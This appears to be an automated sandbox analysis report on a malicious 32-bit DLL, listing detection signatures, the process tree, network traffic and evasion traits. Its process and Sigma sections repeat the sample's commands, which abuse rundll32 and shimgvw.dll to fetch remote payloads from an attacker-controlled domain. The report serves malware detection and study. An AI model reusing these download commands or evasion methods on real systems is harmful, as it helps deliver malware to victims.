
Windows Analysis Report
Dll1.dll

Overview

General Information

Sample name: Dll1.dll
Analysis ID: 1500782
MD5: b14ef85a60ac71c669cc960bdf580144
SHA1: 08906644b0ef1ee6478c45a6e0dd28533a9efc29
SHA256: 861911e953e6fd0a015b3a91a7528a388a535c83f4b9a5cf7366b8209d2f00c3
Tags: dll

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7396 cmdline: loaddll32.exe "C:\Users\user\Desktop\Dll1.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7448 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7472 cmdline: rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7500 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7748 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7456 cmdline: rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7484 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7756 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7952 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8024 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
No configs have been found
No yara matches
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems); Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7456, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 7484, ProcessName: rundll32.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7456, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 7484, ProcessName: rundll32.exe
No Suricata rule has matched


AV Detection

Source: Dll1.dll; ReversingLabs: Detection: 31%
Source: Dll1.dll; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown; HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: Dll1.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6F9E1629
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6F9F1C74 FindFirstFileExW,0_2_6F9F1C74
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6F9E1629
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_6F9F1C74 FindFirstFileExW,3_2_6F9F1C74

Networking

Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 131.153.206.231 443
Source: Joe Sandbox View; ASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected:
    GET /for2/aclog.txt HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: rammenale.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /for2/regit.tmp HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: rammenale.com
    Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: rammenale.com
Source: global traffic; DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic; HTTP traffic detected (the same 404 response was returned six times, differing only in the date header: 20:45:57, 20:45:57, 20:45:58, 20:45:58, 20:45:59 and 20:46:00 GMT):
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Wed, 28 Aug 2024 20:45:57 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3274898545.00000000056DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp$q
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp%
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp.(
Source: rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp/
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp0
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp2
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4P
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4T
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4e
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4r
Source: rundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp5A
Source: rundll32.exe, 0000000C.00000002.3272566960.00000000035DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp60
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003
Source: rundll32.exe, 00000003.00000002.2056608367.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2056574094.0000000003360000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272128849.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272263359.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3273461533.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272566960.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272431562.0000000003480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpE
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpE0
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpG
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpH
Source: rundll32.exe, 00000009.00000002.3273671925.0000000002E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpPR
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpR0
Source: rundll32.exe, 0000000C.00000002.3275204855.0000000009207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpU
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpV
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpY
Source: loaddll32.exe, 00000000.00000002.2084984797.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpaC:
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpd
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpent
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpent0
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpentindowsINetCookies
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmph
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpj
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpk
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpmp
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpmpf
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpo
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpq
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmprmh
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpryh
Source: rundll32.exe, 0000000A.00000002.3273620140.0000000003150000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272288324.0000000003430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmps
Source: rundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpt
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpz
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E970D
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9F44AB
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E93CB
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9F9BE9
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E9A6C
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9F4000
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9E970D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9F44AB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9E93CB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9F9BE9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9E9A6C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9F4000
Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6F9E38C0 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6F9E38C0 appears 45 times
Source: Dll1.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine | Classification label: mal80.evad.winDLL@20/0@2/1
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E1CFA CloseHandle,CoInitialize,CoCreateInstance,CoUninitialize,ExpandEnvironmentStringsW,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: Dll1.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain
Source: Dll1.dll | ReversingLabs: Detection: 31%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Dll1.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Dll1.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Dll1.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Dll1.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Dll1.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Dll1.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Dll1.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Dll1.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Dll1.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Dll1.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Dll1.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Dll1.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Dll1.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9FA301 push ecx; ret 0_2_6F9FA314
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9FA301 push ecx; ret 3_2_6F9FA314
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0475F2EC push 840843CEh; iretd 5_2_0475F2F1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04E0ECB6 push 825076FAh; retn 0002h 9_2_04E0EDEA
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (reported 44 times across the rundll32.exe processes)
Source: C:\Windows\System32\loaddll32.exe | API coverage: 6.7 %
Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 6.1 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7460 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7476 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9F1C74 FindFirstFileExW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9F1C74 FindFirstFileExW
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 30000
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWwR9
